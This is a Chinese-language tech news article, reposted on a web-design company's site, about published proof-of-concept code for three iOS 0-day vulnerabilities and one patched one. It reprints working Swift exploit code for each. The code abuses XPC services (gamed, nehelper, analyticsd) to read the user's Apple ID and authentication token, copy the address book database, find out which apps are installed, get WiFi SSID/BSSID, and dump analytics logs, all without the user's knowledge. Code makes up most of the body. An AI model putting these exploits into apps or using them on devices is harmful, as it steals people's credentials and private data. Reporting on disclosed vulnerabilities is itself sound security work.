13518219792

建站动态

根据您的个性需求进行定制 先人一步 抢占小程序红利时代

研究人员发现三个iOS0day漏洞PoC代码

[[425782]]

成都网站建设、做网站,成都做网站公司-创新互联建站已向成百上千家企业提供了,网站设计,网站制作,网络营销等服务!设计与技术结合,多年网站推广经验,合理的价格为您打造企业品质网站。

研究人员发现3个iOS 0 day漏洞PoC代码。

GitHub用户illusionofchaos在GitHub上发布了4个iOS 安全漏洞的PoC代码,其中包含3个0 day漏洞和1个已修复的安全漏洞。这4个漏洞分别是:

Gamed 0-day

从APP store中按住那个的应用可以在用户不知情的情况下访问以下信息:

PoC代码如下:

  
 
 
  1. let connection = NSXPCConnection(machServiceName: "com.apple.gamed", options: NSXPCConnection.Options.privileged)! 
  2. let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol 
  3. let pid = ProcessInfo.processInfo.processIdentifier 
  4. proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in 
  5.     accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in 
  6.         let appleID = response.credential.accountName 
  7.         let token = response.credential.authenticationToken 
  8.     } 
  9.     utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in 
  10.         let addressBookData = data 
  11.     } 

Nehelper Enumerate Installed Apps 0-day

该漏洞允许任何用户安装的APP来确定设备上安装的APP是否是给定的bundle ID。XPC终端com.apple.nehelper 有一个访问APP的方法可以接受bundle ID作为参数,并返回含有缓存UUID的数组,缓存的UUID可以用来与设备上安装的应用的bundle ID进行配对。具体参见/usr/libexec/nehelper的[NEHelperCacheManager onQueueHandleMessage:] :

  
 
 
  1. func isAppInstalled(bundleId: String) -> Bool { 
  2.     let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2)! 
  3.     xpc_connection_set_event_handler(connection, { _ in }) 
  4.     xpc_connection_resume(connection) 
  5.     let xdict = xpc_dictionary_create(nil, nil, 0) 
  6.     xpc_dictionary_set_uint64(xdict, "delegate-class-id", 1) 
  7.     xpc_dictionary_set_uint64(xdict, "cache-command", 3) 
  8.     xpc_dictionary_set_string(xdict, "cache-signing-identifier", bundleId) 
  9.     let reply = xpc_connection_send_message_with_reply_sync(connection, xdict) 
  10.     if let resultData = xpc_dictionary_get_value(reply, "result-data"), xpc_dictionary_get_value(resultData, "cache-app-uuid") != nil { 
  11.         return true 
  12.     } 
  13.     return false 

Nehelper Wifi Info 0-day

XPC终端com.apple.nehelper会接收用户提供的参数sdk-version,如果该值小于后等于524288,com.apple.developer.networking.wifi-info entiltlement就会跳过。这使得任何符合条件的APP都可以在无需entiltlement的情况下获取WiFi信息。

  
 
 
  1. func wifi_info() -> String? { 
  2.     let connection = xpc_connection_create_mach_service("com.apple.nehelper", nil, 2) 
  3.     xpc_connection_set_event_handler(connection, { _ in }) 
  4.     xpc_connection_resume(connection) 
  5.     let xdict = xpc_dictionary_create(nil, nil, 0) 
  6.     xpc_dictionary_set_uint64(xdict, "delegate-class-id", 10) 
  7.     xpc_dictionary_set_uint64(xdict, "sdk-version", 1) // may be omitted entirely 
  8.     xpc_dictionary_set_string(xdict, "interface-name", "en0") 
  9.     let reply = xpc_connection_send_message_with_reply_sync(connection, xdict) 
  10.     if let result = xpc_dictionary_get_value(reply, "result-data") { 
  11.         let ssid = String(cString: xpc_dictionary_get_string(result, "SSID")) 
  12.         let bssid = String(cString: xpc_dictionary_get_string(result, "BSSID")) 
  13.         return "SSID: \(ssid)\nBSSID: \(bssid)" 
  14.     } else { 
  15.         return nil 
  16.     } 

Analyticsd (iOS 14.7中已修复)

该漏洞允许任意用户安装的APP访问分析日志。这些日志中含有以下信息:

  
 
 
  1. func analytics_json() -> String? { 
  2. let connection = xpc_connection_create_mach_service("com.apple.analyticsd", nil, 2) 
  3.     xpc_connection_set_event_handler(connection, { _ in }) 
  4.     xpc_connection_resume(connection) 
  5. let xdict = xpc_dictionary_create(nil, nil, 0) 
  6.     xpc_dictionary_set_string(xdict, "command", "log-dump"); 
  7.     let reply = xpc_connection_send_message_with_reply_sync(connection, xdict); 
  8.     return xpc_dictionary_get_string(reply, "log-dump"); 

更多参见:https://habr.com/ru/post/579714/

 


网站栏目:研究人员发现三个iOS0day漏洞PoC代码
本文来源:http://cdbrznjsb.com/article/coiheie.html

其他资讯

让你的专属顾问为你服务